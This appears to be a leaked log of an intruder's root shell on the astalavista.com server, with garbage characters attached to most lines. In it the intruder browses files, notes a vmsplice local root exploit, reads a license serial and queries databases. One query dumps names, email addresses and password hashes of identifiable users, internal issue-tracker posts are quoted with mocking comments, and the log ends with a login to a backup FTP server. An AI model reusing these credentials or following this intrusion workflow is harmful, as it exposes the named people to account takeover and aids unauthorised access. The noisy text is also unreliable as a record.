3 _6 l. j! O* Y& D1 F5 V1 r" R1 q) y?>
2 S1 F+ x: Q, k0 l& W m0 Z4 G5 a: P- f( D* I9 I E5 w8 v4 m' F2 x9 R
sh-3.2# cd ..: r! r Y0 n+ H* T. I
sh-3.2# cd com2 l4 m9 }3 u; g C5 G# E V% i
sh-3.2# ls -la
. ~* ~5 \6 S: p& Y( b9 v. Qtotal 141208" t7 n |9 u* h7 l3 `" n
drwx–x–x 10 com com 4096 Apr 28 12:40 .* I8 o: W: {- h; Q8 N
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..7 S. z& c" O; o* ^. M5 B+ B$ ^& R! t
drwx—— 2 com com 4096 Jun 4 04:04 backups# o f; l! S( f7 ^: G' p
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql% L" E$ R* L( _$ \. a
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system9 q2 d- M* c5 |4 K
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
7 J- _2 Y, y' r2 A5 N7 d-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout. t# x$ {5 w2 \
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile! M& _7 g5 Q# U
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc2 o* q! c, d6 b2 X, t K: r
drwx–x–x 3 com com 4096 Jan 29 2008 domains
; m/ u8 b/ n6 [/ f-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed" }( m! r( s; R3 f, T
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap3 w* Y% {) w8 X
-rw——- 1 com com 69 Nov 18 2008 .lesshst2 L1 D( H0 @( y+ @! c5 Q
drwx—— 2 com com 4096 Sep 24 2007 mail. d1 T: n) C' D/ |9 ?! i
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history8 [3 D- y' O3 l, o, ^+ h8 |
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp: {" B. ]3 F5 L* |1 y
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
8 f7 M4 q! y% Z; N-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
7 z# Z& Y& O" N$ c8 ddrwx—— 2 com com 4096 Aug 26 2008 .ssh4 K) j" B% C! D' {2 b) Q+ W6 f" `
-rwx—— 1 com com 8515 Feb 10 2008 t
/ z* O0 L+ K9 b6 j-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
- y! O( o% Z3 `% _" @drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp9 A$ R8 N1 t% |: p3 u
-rw-rw-r– 1 com com 617 May 20 2008 .toprc: e2 Z0 ]+ \- Q% u. _7 d
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
6 g5 }7 }/ \, f2 L& F. v" S, ~+ ?-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
" U: O3 Y- @( U+ _$ n-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
( {# V- U. l9 W9 V( o; H$ m i6 f; \6 j3 ?9 X, E* r* n2 ~. V
sh-3.2# head t.c
; a, g1 d5 S- m0 ?/*
, d+ W: Z+ M7 X$ ^4 I* jessica_biel_naked_in_my_bed.c0 g9 p# |5 q2 M) [8 L
*0 T! h" O, f5 u/ Q6 j0 v
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
2 I F8 k" x; N8 S% `, w- q1 J* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.% C: a% R) Z- o+ J& H
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
& B4 \# P; s& I*& Q4 N- z1 @# V3 ^% p# q- d, y
* Linux vmsplice Local Root Exploit( O9 L" ^& T7 O5 u2 k7 ~
* By qaaz6 T5 z8 V& E0 ?$ @
* Z, q0 L& G1 Y* \0 g1 U
" S) n0 }6 Z8 c/ hsh-3.2# cd /1 V* P& w& T5 X3 u
sh-3.2# ls -la
$ ]' J( A( W" Y' G4 S& p+ E4 L, ~total 360* o9 Y+ X7 a: L1 }
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .$ a+ ^ t) q% e* o1 v5 B) W5 G# j4 v
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
. T+ ^% m% u+ j: J+ u- ~-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
+ P7 ^; u6 e( u# K: [# K. |-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
6 O0 ]1 O* h% o& m! L3 T7 M& c-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db5 G H8 f. Y6 ~) \0 c
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck- n1 w1 {7 ]+ g$ G* t% R
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
! D! L8 x8 F' e7 {* i; z+ P( x7 i8 bdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
4 S# k5 p9 z$ ^drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin, v8 Y# _0 [% e7 U, D2 Q
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
7 q9 D9 k- p' c4 F5 h5 q9 adrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev4 y6 s- |- V5 ~. g# q1 H, G
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
* E0 O- F2 g3 n( zdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
# m P+ S: f/ W3 E1 X" m+ E-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf+ w& g! g% |" o- S
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib) g# \, q$ {. ]1 p* ~% }2 ~9 d
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64: Z0 I- ?- J/ K, O
drwx—— 2 root root 16384 Sep 11 2007 lost+found
: p4 }# X' ` n6 h0 sdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
* N+ l+ k8 a/ C9 u& L& p7 Pdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc0 Q6 G0 I+ Q" f0 A0 B0 n2 \# D' z* T
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt' `2 E* x2 b( o( u( Y/ p3 e; s
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg2 m- o' u: r+ _0 J# ?, w
drwxr-xr-x 2 root root 0 Jun 3 02:43 net: \4 k; x z1 z7 V2 f6 B5 _8 M' q
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
* ~4 k! I: N1 G, I5 Ndr-xr-xr-x 264 root root 0 Jun 3 02:42 proc2 Z1 E( b& z$ d1 l% {
drwxr-x— 15 root root 4096 Jun 4 08:40 root6 ?% P/ L, T- z2 V9 p
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin3 P6 i4 D/ }* U& Q+ x
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
. {1 d9 h) V& q' Z/ Adrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv, G9 ^: ^# a2 E" I
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
1 t1 e: I2 I `, ~4 X {! Xdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
6 {# }4 Q% x0 A) } ^* ]* ]drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
! [4 _5 c# I% K* h$ C0 @! ?) A( Qdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
) Z) ^+ d6 l3 i* I9 {# x- d8 [* Q. |! e0 g6 u5 @5 x
sh-3.2# cd opt4 c! d! |9 w' [: D
sh-3.2# ls -la! z4 a; R. K _
total 20
/ g* P6 D: W" B8 k' Qdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .- f" v8 R' c% h1 \
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..9 @) `9 Y: n" R* {1 Q3 B
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
" J/ w% {4 ~$ V5 Y& k9 w" Q
8 y* I4 z/ |4 w3 w" G. d% ysh-3.2# cd lsws/" K1 ]/ K) m3 [/ O! d( m6 F9 m: ~
sh-3.2# ls -la
D1 ^2 b f, i8 f' [: ?7 T3 vtotal 1087 |3 K$ V; c5 {; L) z0 E R
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
* R, }" z0 ~9 wdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
" `) l: @8 e6 d; T5 g$ w. @% I( j* x+ @drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons4 E k1 z/ c$ P2 b" b- |7 |- k
drwxr-xr-x 13 root root 4096 May 29 15:10 admin l/ {( \9 |. b. K; @1 M& x
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate$ q# o& d. e* H5 `* l& e) E' y* p
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
+ J2 i& V8 v, K( w2 N$ F8 ndrwx—— 4 apache apache 4096 Jun 3 02:43 conf
7 ]5 {0 L* L0 z. S8 P G* t$ rdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT1 g$ \8 ^$ o4 ], X
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
6 f; k5 h" j$ y D$ q8 R- `, Rdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
9 M2 t, u) S% l8 k) [: A0 \drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
& p2 f5 |7 k, \5 U+ T# b% C-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
! ?* _% Y% ?& g& H W2 h7 s: N/ C* `4 E-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
0 s* D: L0 k/ ] `-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
' {2 {1 L% t1 o% b4 Y4 N# G9 q-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
Q1 I. Y# w0 t8 r ^$ Qdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
1 V Y- s4 J3 l2 q }% N+ i) k4 o" Ndrwxr-xr-x 2 root root 4096 Mar 20 2008 php
$ T& x+ ?3 n- W8 R9 Ydrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
9 c O! w$ T; c( V! Sdrwxr-xr-x 3 root root 4096 Mar 20 2008 share0 d# v( T$ _8 Z3 N- l3 r) r
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
1 |3 [1 j" j# @; B# T3 y9 W8 q: u7 y% @# s7 }1 b9 |$ L! c/ `1 k
sh-3.2# cd conf8 H9 ^3 Z8 a# {2 w* M, x
sh-3.2# ls -la
: ]5 R: a/ Y2 H( u$ ytotal 48/ |" `/ u3 T* f) G" j6 F8 |
drwx—— 4 apache apache 4096 Jun 3 02:43 .
/ a3 B' U' ^; @drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
* b2 A0 [* R! f5 \) d$ F& @2 l4 Vdrwx—— 2 apache apache 4096 Mar 20 2008 cert4 C ?" ~/ Y, g7 \- r8 X
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
3 ]0 T6 U$ Y: c1 c-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak4 Z* r, N& S/ e! x0 b
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
% j; c3 }7 p) |, J+ h7 V, ~0 H3 [-rw——- 1 apache apache 256 May 29 15:10 license.key7 v8 F" d% R) q7 T
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
' c: l. Z+ A/ h& g7 N9 x! G-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties" X6 j$ p& n) F" V! A
-rw——- 1 apache apache 20 May 29 15:10 serial.no9 f" N4 N. F" X1 ]$ o U
drwx—— 2 apache apache 4096 Mar 20 2008 templates' S, M. b. Y( e z
* x" L* [2 l9 G4 Q0 G; msh-3.2# cat serial.no
" j# q: a( {4 O2 t6 Y, {/ kIbDl-oVsO-CKqL-wVRa s1 W m: L Q
; _- w' `7 \0 E
sh-3.2# mysql: a7 A+ V$ s+ Z/ `) D0 N3 W" Y6 @
Welcome to the MySQL monitor. Commands end with ; or \g.
: s9 X: q7 _! W6 X% s" KYour MySQL connection id is 286844
1 C) g/ F, o0 }/ m- \Server version: 5.0.45-community-log MySQL Community Edition (GPL)" Q) t* _; {3 m
8 @# v2 m2 r# H
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
* H% E/ {& l+ a( c1 a+ |: y# p3 C9 r2 s* f$ x1 [1 a( M1 \3 A
mysql> show databases;! j" K/ t& d' f( P' P5 m
+———————–+3 q9 t7 a7 l+ D; H: Q) d8 n2 V
| Database |& U* @# k1 a4 h
+———————–+3 n, h& ?% O& c4 V) b
| information_schema |& h, h1 h1 v# ?. n3 ]
| astanet_ads |& S2 t; X6 g/ F0 P% ^1 h
| astanet_mailing_lists |
' c. B0 @6 c* H1 Y+ H! s| astanet_mediawiki |
8 } @) d# e8 W b' f0 T T8 d7 w5 `| astanet_membersystem |
1 U! d7 n B; x% X% Q- t0 b| com_contrexx |
" D: V4 U) K6 t8 X' w' E| com_contrexx2 |
' q+ x0 U" d: I6 l- `: z5 P- || com_contrexx2_live |
- f7 R& @$ V5 E7 k! L( M3 F| da_roundcube |+ g' ]5 h8 D& Z: M# y+ v
| dolphin |
" K) K5 h: ~8 V) j- F- d| ideapool |
* f. A! `3 C3 q0 A) || mysql |
' n1 ]4 e- M+ A, j: z% X% N| test |
9 z) O" A+ \# Q5 r( S| yourmaster |: j# r& y& n/ R
+———————–+
0 O7 f9 P" w9 s1 [& \9 v14 rows in set (0.00 sec)- e# z$ Y. A! U, u: H( \3 o
% M' x/ F0 _& s6 ~' I6 l9 Pmysql> use ideapool
1 v( V1 g4 o A9 ]) I n; \6 R m GDatabase changed, m. b" i- {! K6 h4 D, L4 d# B
mysql> show tables;; u1 {6 Q5 h: q7 w5 t! P% y
+———————————–+
, l. {; b3 r4 l. j# ?* \| Tables_in_ideapool |
. s. X3 H; b" j2 z" {* J+———————————–+
8 |. \- x m9 C0 c2 K| eventum_columns_to_display |: g0 n# u" ^; m, h' O8 G
| eventum_custom_field |
0 G- [; o* {1 ?$ {" \" H1 a| eventum_custom_field_option |
9 l# y1 n% y; Z* U3 i' j1 L9 F/ p| eventum_custom_filter | g* v& s% _" x
| eventum_customer_account_manager |# Y" d( X y6 w, w/ e
| eventum_customer_note |
4 p' r' I7 o% A {| eventum_email_account |
4 z; ?5 J% V6 H& p9 h1 A+ y| eventum_email_draft |- h- b& @& H. }4 y% c$ U. c
| eventum_email_draft_recipient |
0 D$ }/ x& O, R! ]) w( a| eventum_email_response |
8 o0 x$ t6 k$ x- G" G| eventum_faq |7 V) A7 s' ] J! f' n# T9 H5 H
| eventum_faq_support_level |
5 c n7 r) p. [$ N! w5 p| eventum_group |
2 w5 q* m$ V4 u| eventum_history_type |: ~6 k3 C6 |7 b1 k$ z
| eventum_irc_notice |0 I d, b' x# s ~$ B" I3 D- ?
| eventum_issue |
; c+ D5 X& R( g( V5 g; w* g$ V3 r' } Y0 a| eventum_issue_association |, X0 Z% j0 j, I6 y5 j
| eventum_issue_attachment |2 ?8 g6 N: R3 \2 T5 D
| eventum_issue_attachment_file |
1 f/ j+ w1 x. A/ c- b% E A| eventum_issue_checkin |
! s* a6 `# v8 Z9 r8 w' o' ?| eventum_issue_custom_field |/ }; F% p( S3 q- n! d; T
| eventum_issue_history |" C" Z# P% s* H' k1 G$ N* p
| eventum_issue_quarantine |
3 [6 K) }( _9 n- ^8 h3 @0 B| eventum_issue_requirement |
0 L' m7 T5 P; B( u$ m| eventum_issue_user |( [( s: y. ~& Y2 A3 Q
| eventum_issue_user_replier |
# y9 s, }4 T4 L) O$ P" v& }| eventum_link_filter |+ H' O1 f+ I& @8 W5 D
| eventum_mail_queue |- O: x" a) e( C4 N- {6 k, ?3 k& P' b
| eventum_mail_queue_log |
4 k6 O+ _9 [" ]$ T6 Y| eventum_news |
) t/ `+ @% q4 G0 k$ n" F1 v) ]% [| eventum_note |/ B) K# M' ~& z. x; Q" p% q2 E; B5 N
| eventum_phone_support |; t4 ?' \* b8 I
| eventum_project |
n9 ^3 Z5 Y- p9 }6 l0 Y| eventum_project_category |# _6 Y7 O# t( |. x
| eventum_project_custom_field |
; O2 }" N: X; H; p( ~6 h2 r8 || eventum_project_email_response |* i& b6 b" G! Q, G% w% D
| eventum_project_field_display |* Y- \0 }9 q- g5 F/ q/ t( s2 i5 U0 j
| eventum_project_group |) S1 i8 |9 V, J
| eventum_project_link_filter |8 T b& i1 S1 X* E& v: u
| eventum_project_news |
! {; O" O7 s6 X# L( _1 C4 c| eventum_project_phone_category |
/ k& u5 A B; Q) ^. `9 M| eventum_project_priority |
& m: { c, R3 b- s* V| eventum_project_release |
! h0 c' e, s% J& D| eventum_project_round_robin |
* t' v, \% {( J2 e6 [# {- T2 X5 N4 @| eventum_project_status |
. @: o, Q1 [* K+ @; k4 s3 k( M| eventum_project_status_date |+ Q E N- e. u8 E8 D, C. C2 l
| eventum_project_user |( R+ E6 G8 W' M3 G( O c1 M, I4 x: Z
| eventum_reminder_action |
4 R) w7 K- ]; x$ P6 S3 m| eventum_reminder_action_list |
4 ^4 o( Q# q, w# O% ?, m3 a| eventum_reminder_action_type |) P( ^6 \* K. t* n; v
| eventum_reminder_field |
" q" |: x( H7 h3 I! c5 i| eventum_reminder_history |$ ?5 D. O7 p e) P4 N0 k- m
| eventum_reminder_level |2 {- ^9 n/ T' ~3 t3 q
| eventum_reminder_level_condition |
; O# l, s3 T1 X9 I3 X| eventum_reminder_operator |2 s a8 }/ `% [
| eventum_reminder_priority |
9 |4 P7 n# a" K) }6 P* B: c. [| eventum_reminder_requirement | X% ~, L/ T6 _+ i
| eventum_reminder_triggered_action |
( P; z: `- Q) q! ?* q| eventum_resolution |* k. Y1 g7 u6 `; F6 B; O5 [; T1 }
| eventum_round_robin_user |8 f% f. C0 w7 _& ^
| eventum_search_profile |
0 B# R( v8 e0 G$ I% w, p| eventum_status |
& G3 U% v% b$ u& ]' Z$ ~( E0 \| eventum_subscription |3 }" Y2 v! r% l* @+ o* t
| eventum_subscription_type |
/ ] N1 q' W9 j2 N9 N* ^% V| eventum_support_email |
?! `8 \6 _ d Q l| eventum_support_email_body |
: W7 X" b- `& F3 V| eventum_time_tracking |
l+ ?- j* X/ r9 f5 t% I| eventum_time_tracking_category |( Q* s* C0 e# P) K. g2 l1 j% t( `4 E
| eventum_user |' U0 W4 P5 y8 R& w5 w: A
+———————————–+
+ V9 k, A8 U7 J8 L69 rows in set (0.00 sec)6 S5 T/ `0 ]5 }1 T" ~) \
2 k& s0 f; t3 \7 b+ v
mysql> describe eventum_user;0 [0 r1 l( V) V" W8 z' `
+————————-+——————+——+—–+———————+—————-+
' z, C$ D8 V1 I! c) P5 }0 N6 l/ f| Field | Type | Null | Key | Default | Extra |2 m/ n6 t& F( i# O0 F c5 @4 {
+————————-+——————+——+—–+———————+—————-+
* i o0 \8 u& N. l) Q7 k| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
& [' X7 [" ]% q( F& A. Z| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |! S! h$ H* |& c) r
| usr_customer_id | int(11) unsigned | YES | | NULL | |+ g" C- |' X, _: t1 \" W5 _6 m: q
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |) `5 j. r" g4 d
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
6 ^% f7 q, H- u6 b* X1 @0 J7 q| usr_status | varchar(8) | NO | | active | |
8 {+ `- n. ?, m/ v& w& z/ u- s& B| usr_password | varchar(32) | NO | | | |
& F7 `, R& L3 u- e/ c e; u| usr_full_name | varchar(255) | NO | | | |
. p# z- U" E5 f- b- \| usr_email | varchar(255) | NO | UNI | | |
/ j3 A* X! Q& g7 j. f| usr_preferences | longtext | YES | | NULL | |% V, T; ?! m3 r: E
| usr_sms_email | varchar(255) | YES | | NULL | | u' @. ^7 n# c9 e( v
| usr_clocked_in | tinyint(1) | YES | | 0 | |
( E! ^" n% Y6 z: ^0 }* y8 u0 h. U| usr_lang | varchar(5) | YES | | NULL | |2 O+ x& Q0 c9 W2 o- c
+————————-+——————+——+—–+———————+—————-+
0 j0 O0 y- d6 S7 }1 I13 rows in set (0.00 sec)
5 k4 ^! \( f# _ Y `6 H3 Q. [7 {! M) ]& w" N( D7 w+ x
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
7 y, a0 h6 J- L6 t+———————-+——————————-+———————————-+$ I2 I1 V/ U" K" I# ]
| usr_full_name | usr_email | usr_password |! {/ Q! R _/ ~2 | h2 H! q* G
+———————-+——————————-+———————————-+; @: e5 K2 y$ Q: q# X0 U( r5 D; }( o
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
9 y! X) F9 @* Q( s: A% Y| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |) L5 `# \. K0 t n; j' O4 `
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |0 `1 z. x z; Q1 Q4 I: @
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |9 U% s3 ]0 b! W/ ^6 L+ I
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
+ `# N" s- p7 D) s$ `- c| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
4 R% I( _1 D+ t; s! n% O; F" N| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
) _, y5 p0 o# T4 {, v9 b3 e: E| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd | I' H' B: \: h4 q7 T
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
6 R* E/ h- b3 i: N| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |3 y; H9 j/ v) r/ p1 S
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
0 U# K1 r' h8 J& G| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |+ c5 M+ Q& J+ u8 m5 o
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
1 \: ?5 |# S- |7 l" y5 U! L| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |# H- i8 b. T, d0 l4 i6 c, B
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
* \* _6 \% O! k+———————-+——————————-+———————————-+
! ~' L, {( Z' K( C) v6 c- T- _15 rows in set (0.00 sec)' f) U* f0 Y8 _8 D, C
: z, ^+ p5 P$ N- G( J V- nmysql> select iss_description from eventum_issue where iss_id = 43;% z( q& _0 S" o) f9 ]
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+* n9 S3 K* W2 j5 G0 @9 o, ^ o2 D
| iss_description
2 h9 H) [' I4 H& a, O|
! l; P0 A) a' k- C! t+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+' K# N/ {* X3 o+ X
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be. z5 i5 z" l% f4 I' ~8 g
connected for 90 mins… 120mins… so what i propose is something like:
( T, y( }4 e/ r! @链接标记[url]http://www.surfthechannel.com/[/url]: _6 F; w: a n3 M J5 q: J8 T3 Y- J
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system; D D/ N. t9 q0 \+ |7 k" r% [; i
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
, i; }2 O- K+ C W0 ebreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
' A$ N }7 {' Q jif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
0 z( J7 R" N2 e' H1 X3 n* |# `0 H
" A5 Z0 H n4 ~& BWe could also put advertisement during play on the flash video player itself… extra $$…5 k a d# L) T) L+ \+ x/ d* x
# a( C+ J# T1 h. ]& O* O
By sykadul |- f9 q- J9 c& ~+ {) J! S `$ E
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
% u1 L1 g4 N2 l8 I- x; s1 row in set (0.00 sec)
9 t+ @) `# k0 E) i n1 S' |
' p5 t, m5 k" j% @1 N* k3 D' z% d# q! \// Money and extra $$ is all they care about. remember that.0 e* g- d, O& [; d9 u
$ D4 }! v: v3 {, t" f
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;1 J0 D- {: \) J
+————————+——————————————————————————————————————————————————————————————————————————————-+
, W2 E8 l n* p) m' i2 Z| iss_summary | iss_description
4 R2 i$ \6 u- [- v: Y; H|% V# m" G1 [5 ^4 o
+————————+——————————————————————————————————————————————————————————————————————————————-+
( ~* u" B# w) s2 |( ~| Forum for REAL EXPERTS | Hello,) X( d4 H! F, [! |9 s
9 s9 O) ?% y+ E% a6 R' q
Ishtus and I,) L' E9 B% v9 n1 V# {
* W4 ?1 f1 P& s& P* M
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
; o9 i. u; K" B9 P8 }# |* i8 a0 pONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
8 |) o5 k6 G5 u6 i' b0 v' w* q% V- C0 |' J% {8 Y
One example a friend of mine from coresecurity.com!
' t; S$ X) }( q% a& c* n8 W0 E$ ^8 c, q, T+ r3 R) a) z: B# K
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..; `* y J9 l" l
5 z, a# R/ D! D- p1 g" z v
|
& p5 l- y' x$ ~6 A, t+————————+——————————————————————————————————————————————————————————————————————————————+& i/ y1 ^) p+ n. D
1 row in set (0.00 sec)
" v' O x$ `: I( i7 P0 \' l2 ?6 S4 o; i) s, j8 [
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
5 O( Q; C. x) l! Q9 G
8 s: m5 J3 y% zmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
9 D7 `/ K8 g3 m' p+——————+———————————————————————————————+# F3 Y4 M! {* Z; c! a: R
| iss_summary | iss_description |
, t5 A$ d9 O* `0 D, s8 B4 @+——————+———————————————————————————————+/ }/ D9 s2 g# m9 L& E
| Website guidance | Virtual Girl which guides you trought the website.+ l# c( q1 b6 l1 K/ f; k
/ N) e# n' K! M7 j/ |
We need a girl with who you can ( talk )!!!: T8 V! i( Y& G# x/ X
Also for the News! U5 ^1 ^/ H/ T5 f
So my suggestion is a girl who read you the news loud if you like!
2 f4 U; {& I$ ]2 n: q6 l) _* p, @, hyou can choose between read yourselfe or she read it for you or both!( g2 v1 D: ~+ P0 V
' K% A3 }" W% c. J9 d# _, ?$ n
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
; e4 O3 w+ _" E4 K3 } w; f5 L4 p2 d. g" _* }
Have a look on the example girls!!
! y9 X# C+ S. W5 x* N
$ M! W7 ~% U8 `9 u. @链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]6 o; Y2 {' G! z/ A1 H3 G3 @
; o" I) f: _/ Y S. M1 H3 q- Sor that0 ?4 g# S T( Y$ e7 Z2 B7 h9 U0 p
( H( H2 A, F' v3 Z& M. r& z2 P2 _
链接标记[url]http://www.yellostrom.de/[/url]
; |& X, y% O) Y; R& m _0 f1 k+ N+ o$ I9 k# b
|" z( ]( _* H" ?# e6 v' O- ^! \& z2 N
+——————+———————————————————————————————+
. G# c' X# ^3 A6 J1 row in set (0.00 sec)2 e8 [( `# `7 y2 L; K
, k5 b# S$ C8 `- p) O# h! q
// ha ha.; H' s- x: q$ S+ D/ O. y+ F
9 E' U. P, o8 k. y; {: S8 `
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;) _" d/ ?0 U1 X+ R0 b
+————————–+———————————————————————————————————–+' _' R: ]7 n8 d8 d
| iss_summary | iss_description |
: R, `& F5 i2 B. ~+————————–+———————————————————————————————————–+
; U. U8 G) h4 Z9 r6 p| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |* _ _+ I) w3 J
+————————–+———————————————————————————————————–+! `$ A( z. p+ v( r( R
1 row in set (0.00 sec)5 _5 Z5 @3 p9 @) ?
: d' b* p5 q1 e8 p8 ~// LOL.' _# q1 n+ f- z8 Z+ D( u
r/ B- Q" A1 Y" c9 Bmysql> exit' t; W1 ^3 m/ ]2 Y6 x+ r
Bye- Z5 ?% {3 F! T9 k) q! n" r
: n. U g) w# A# L; B5 o
sh-3.2# ftp 212.254.194.163+ r; f5 F1 {1 b* ^8 A
Connected to 212.254.194.163.9 {) E2 b% ~1 h/ f: V
220 BackupCOM_VW FTP server ready.5 R" _6 I1 p; a, E
504 AUTH: security mechanism ‘GSSAPI’ not supported.
) {# g7 R' H# q, [% y504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.3 V; f5 P0 i! _9 n
KERBEROS_V4 rejected as an authentication type# J! w- e7 t% S2 w0 h4 v
Name (212.254.194.163:root): astalavista.com
1 ~* i' n9 s z2 S331 Password required for astalavista.com.5 O5 G/ F0 p: ]6 G( j
Password:
" i& F3 O0 k! x, t230 User astalavista.com logged in.
1 t5 {% H2 [* n7 q' ~5 z7 l2 MRemote system type is UNIX.* j+ Q# S; I3 L4 X5 ^% |3 X
